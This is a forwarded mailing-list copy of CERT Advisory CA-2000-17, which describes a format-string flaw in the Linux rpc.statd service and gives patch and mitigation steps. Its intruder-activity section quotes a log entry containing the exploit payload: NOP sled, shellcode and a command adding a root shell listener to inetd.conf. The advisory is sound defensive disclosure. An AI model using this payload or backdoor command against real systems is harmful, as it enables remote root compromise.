----- Forwarded message from CERT Advisory <[EMAIL PROTECTED]> ----- > From: CERT Advisory <[EMAIL PROTECTED]> > Reply-To: [EMAIL PROTECTED] > Date: Fri, 18 Aug 2000 17:58:01 -0400 (EDT) > To: [EMAIL PROTECTED] > Subject: CERT Advisory CA-2000-17 > > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > CERT Advisory CA-2000-17 Input Validation Problem in rpc.statd > > Original release date: August 18, 2000 > Source: CERT/CC > > A complete revision history is at the end of this file. > > Systems Affected > > * Systems running the rpc.statd service > > Overview > > The CERT/CC has begun receiving reports of an input validation > vulnerability in the rpc.statd program being exploited. This program > is included, and often installed by default, in several popular Linux > distributions. Please see Appendix A of this document for specific > information regarding affected distributions. > > More information about this vulnerability is available at the > following public URLs: > * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666 > * http://www.securityfocus.com/bid/1480 > > I. Description > > The rpc.statd program passes user-supplied data to the syslog() > function as a format string. If there is no input validation of this > string, a malicious user can inject machine code to be executed with > the privileges of the rpc.statd process, typically root. > > Intruder Activity > > The following is an example log message from a compromised system > illustrating the rpc.statd exploit occurring: > > Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname > containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53 > 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 > 696e6961 2720676e 203a272f > 00000000000000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000000bffff7 > 0400000000000000000000000000000000000000000000000bffff7050000bffff70600000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000000000000 > 0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90 > ><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90 > ><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83> <8D>^( > <83> <89>^<83> <8D>^.<83> <83> <83>#<89>^ > 1<83> > <88>F'<88>F*<83> <88>F<89>F+, > <89><8D>N<8D>V<80>1<89>@<80>/bin > /sh -c echo 9704 stream tcp > nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd > > If you see log entries similar to those above, we suggest you examine > your system for signs of intrusion by following the steps outlined in > our Intruder Detection Checklist. If you believe your host has been > compromised, please follow our Steps for Recovering From a Root > Compromise. Please check our Current Activity page for updates > regarding intruder activity. > > II. Impact > > By exploiting this vulnerability, local or remote users may be able to > execute arbitrary code with the privileges of the rpc.statd process, > typically root. > > III. Solution > > Upgrade your version of rpc.statd > > Please see Appendix A of this advisory for more information about the > availability of program updates specific to your system. If you are > running a vulnerable version of rpc.statd, the CERT/CC encourages you > to apply appropriate vendor patches. After making any updates, be sure > to restart the rpc.statd service. > > Disable the rpc.statd service > > If an update cannot be applied, the CERT/CC recommends disabling the > rpc.statd service. We advise proceeding with caution, however, as > disabling this process can interfere with NFS functionality. > > Block unneeded ports at your firewall > > As a good security practice in general, the CERT/CC recommends > blocking unneeded ports at your firewall. This option does not remedy > the vulnerability, but does prevent outside intruders from exploiting > it. In particular, block port 111 (portmapper), as well as the port on > which rpc.statd is running, which may vary. > > Appendix A. Vendor Information > > This section contains information provided by vendors for this > advisory. We will update this appendix as we receive more information. > If you do not see your vendor's name, the CERT/CC did not receive a > response from that vendor. Please contact your vendor directly. > > Berkeley Software Design, Inc. (BSDI) > > No versions of BSD/OS are vulnerable. > > Caldera, Inc. > > Not vulnerable: None of our products ship with rpc.statd > > Compaq > > At the time of writing this document, Compaq is currently > investigating the potential impact to Compaq's rpc.statd service. > Initial tests indicate it is not a potential vulnerability for Compaq > supplied software. > > As further information becomes available Compaq will provide notice of > the completion/availability of any necessary patches through AES > services (DIA, DSNlink FLASH and posted to the Services WEB page) and > be available from your normal Compaq Services Support channel. > > Debian > > http://www.debian.org/security/2000/20000719a > > FreeBSD > > FreeBSD is not vulnerable to this problem. > > NetBSD > > NetBSD 1.4.x and NetBSD 1.5 do not appear to be affected by this > problem; all calls to syslog() within rpc.statd take a constant string > for the format argument. > > OpenBSD > > *Linux* systems running the rpc.statd service! > This affects noone else! > > RedHat > > http://www.redhat.com/support/errata/RHSA-2000-043-03.html > > Silicon Graphics, Inc. > > IRIX rpc.statd is not vulnerable to this security issue. > _________________________________________________________________ > > Authors: John Shaffer, Brian King > ______________________________________________________________________ > > This document is available from: > http://www.cert.org/advisories/CA-2000-17.html > ______________________________________________________________________ > > CERT/CC Contact Information > > Email: [EMAIL PROTECTED] > Phone: +1 412-268-7090 (24-hour hotline) > Fax: +1 412-268-6989 > Postal address: > CERT Coordination Center > Software Engineering Institute > Carnegie Mellon University > Pittsburgh PA 15213-3890 > U.S.A. > > CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) > Monday through Friday; they are on call for emergencies during other > hours, on U.S. holidays, and on weekends. > > Using encryption > > We strongly urge you to encrypt sensitive information sent by email. > Our public PGP key is available from > > http://www.cert.org/CERT_PGP.key > > If you prefer to use DES, please call the CERT hotline for more > information. > > Getting security information > > CERT publications and other security information are available from > our web site > > http://www.cert.org/ > > To be added to our mailing list for advisories and bulletins, send > email to [EMAIL PROTECTED] and include SUBSCRIBE > your-email-address in the subject of your message. > > * "CERT" and "CERT Coordination Center" are registered in the U.S. > Patent and Trademark Office. > ______________________________________________________________________ > > NO WARRANTY > Any material furnished by Carnegie Mellon University and the Software > Engineering Institute is furnished on an "as is" basis. Carnegie > Mellon University makes no warranties of any kind, either expressed or > implied as to any matter including, but not limited to, warranty of > fitness for a particular purpose or merchantability, exclusivity or > results obtained from use of the material. Carnegie Mellon University > does not make any warranty of any kind with respect to freedom from > patent, trademark, or copyright infringement. > _________________________________________________________________ > > Conditions for use, disclaimers, and sponsorship information > > Copyright 2000 Carnegie Mellon University. > > Revision History > August 18, 2000: Initial release > > > > > > > > > > > > > -----BEGIN PGP SIGNATURE----- > Version: PGP for Personal Privacy 5.0 > Charset: noconv > > iQA/AwUBOZ2tv1r9kb5qlZHQEQKPhwCfVPCFRgGcLymQ/SiMh1hHr0r1/CkAn04x > BWp9xn1wq0xkW49b7dFnHr7l > =l/C2 > -----END PGP SIGNATURE----- > > ----- End forwarded message ----- -------------------------------------------------------------------------- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3 Pengelola dapat dihubungi lewat [EMAIL PROTECTED]
